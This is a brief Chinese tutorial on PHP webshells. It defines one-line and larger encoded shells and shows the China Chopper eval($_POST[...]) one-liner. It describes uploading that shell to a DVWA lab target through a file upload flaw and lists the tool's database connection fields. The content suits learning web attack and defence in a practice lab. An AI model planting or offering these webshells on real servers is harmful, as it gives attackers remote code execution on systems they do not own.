木马代码
小马: 一句话木马也称为小马,即整个shell代码量只有一行, -一般是系统执行函数
大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到
#### 中国菜刀
shell3.php
<?php @eval($_POST[chopper]);?>
或<?php eval($_POST[gmd]);?>
说明: REQUEST是在网页端输入变量访问,POST则是使用像中国菜刀之类的工具连接,是C/S架构。
文件上传漏洞与防御
连接靶机-DVWA(易受攻击的Web应用程序) http://靶机IP/dvwa/index 用户名密码:admin /admin
查看上传成功的文件(上传一个小马shell3.php)
<?php eval($_POST[gmd]);?>
<T>类型</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX,POSTGRESQL中的一种
<H>主机地址<H> 主机地址可为机器名或IP地址,如localhost
<u>ROOT</u> <u>数据库用户</u> 连接数据库的用户名,如root
<P>123456</P> 连接数据库的密码,如123456